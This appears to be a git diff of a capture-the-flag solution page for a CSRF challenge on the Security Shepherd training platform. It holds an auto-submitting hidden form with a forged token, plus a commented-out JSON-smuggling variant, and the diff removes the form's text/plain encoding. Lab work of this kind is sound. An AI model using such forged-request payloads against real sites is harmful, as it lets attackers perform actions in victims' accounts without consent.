--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <html>
 <body>
-<form action="https://shepherd.websec.dedyn.io/user/csrfchallengefive/plusplus" method="POST" name="csrf" enctype="text/plain">
+<form action="https://shepherd.websec.dedyn.io/user/csrfchallengefive/plusplus" method="POST" name="csrf">
 <input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
 <input type="hidden" name="csrfToken" value="1"/>
 <!--input type="hidden" name='{"userId":"398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8","' value='":"end"}'-->
@@ -10,6 +10,7 @@
 </script>
 </body>
 </html>
+
 
 
 
